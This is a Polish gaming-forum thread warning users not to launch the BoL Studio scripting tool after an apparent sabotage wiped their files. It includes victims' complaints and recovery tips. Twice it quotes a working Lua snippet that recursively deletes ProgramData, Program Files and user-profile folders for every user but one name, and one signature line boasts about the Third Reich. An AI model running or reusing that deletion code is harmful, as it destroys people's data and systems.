Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Nieaktualne] NIE WŁĄCZAĆ BOL STUDIO / INFEKCJA !

Rekomendowane odpowiedzi

Opublikowano

mi jakoś nic nie usuneło wszystko jest free bol 0 cracked :)

edit : o k***a nic nie mam na pulpicie japierodle co to ma być ? ? ? ? ? ? ?? ? ?

Uchowal wam sie system i stertowniki?

Jestem über alles, kurwa jak Trzecia Rzesza

• Odpowiedzi 98
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Uchowal wam sie system i stertowniki?

To ci nie formatuje dysków tylko moje dokumenty ci usuwa (tj.cały pulpit , skróty , roaming)

kurw nie mam żadnej kopii zapasowej musze reinstalować cały win7?

Nie ..

Opublikowano

kurw nie mam żadnej kopii zapasowej musze reinstalować cały win7?

Mi system siedzi jeszcze nw jak sterowniki , odziwo lol mi zostal bo na innym dysku mialem ale cale user data usuniete.

Opublikowano

Dzięki za informacje ehh dobrze że z bola nie korzystam już od jakiś 2miechów :)

Opublikowano

no to powiedzcie co zrobic xD

To co w takim razie robić, pulpit jest pusty żadnych programów. hulp!!!

Nic już się nie da zrobić ew. przywracanie systemu (pod warunkiem że w ogóle zrobiłeś takowy punkt)

edit.

Tu kodzik :

if GetUser() ~= 'Nulled.IO' then

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramData"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles(x86)"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\..\\"')

end

Opublikowano

--- tu jest wszystko wytlumaczone, to nie wina cracked skryptow, ani cracked bola. Prawie kazdy legit czy nie dostał

// Proszę nie wstawiać linków do takich stron. Możesz zacytować jego post lub zrobić screena wypowiedzi z ważną informacją :)

Renissance

Opublikowano

Nic już się nie da zrobić ew. przywracanie systemu (pod warunkiem że w ogóle zrobiłeś takowy punkt)

edit.

Tu kodzik :

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramData"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles(x86)"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\"')

RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\..\\"')

no to musze zainstalować windowsa od nowa bo nie mam nawet punktu

qxw0er.jpg

Opublikowano

edit.

Tu kodzik :

end

Czyli nic nie pozostaje, tylko format. Nie przewidywałem nigdy że jakieś śmieszkowate Szwaby zrobią taki numer więc nie robiłem kopii zapasowej. ://///////////////

Opublikowano

no to musze zainstalować windowsa od nowa bo nie mam nawet punktu

Zrób nowy profil i nie potrzebny ci format , chyba że bardzo chcesz całkowity reset

Czyli nic nie pozostaje, tylko format. Nie przewidywałem nigdy że jakieś śmieszkowate Szwaby zrobią taki numer więc nie robiłem kopii zapasowej. ://///////////////

up
Opublikowano

Jedna zasada - jeśli nigdy nie robicie kopii zapasowej i myślicie, że wam to jest niepotrzebne, to radzę zmienić zdanie. Raz zrobienie backupa na miesiąc wam nie zaszkodzi, a w każdej chwili możecie przywrócić system, bo wszystko może się zawsze zdarzyć. Błąd człowieka, złe oprogramowanie lub brak współpracy maszyny. :)

Opublikowano

wow udało mi się przywrócić :) co zrobić by znów tak się nie zrobiło :D ?

Nie ruszać BoLa dopóki tego nie naprawią.

Opublikowano

ok ... znalazłem...wszystkie skasowane pliki znajdują się w C:\$Recycle.Bin\
Mam nadzieje, że pomoże to wam w jakis sposób - jedyny problem polega na tym, że folder jest ukryty i pliki w nim również :D

Opublikowano

co to się narobiło mam zwałe jak mnie to omineło xdd a tak samo korzystałem z finna ^^

Wlasnie, ze nie tylko finn bo legity tez dostaly po d***e.

Opublikowano

ok ... znalazłem...wszystkie skasowane pliki znajdują się w C:\$Recycle.Bin\

Mam nadzieje, że pomoże to wam w jakis sposób - jedyny problem polega na tym, że folder jest ukryty i pliki w nim również :D

nie ma takiego folderu u mnie 

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...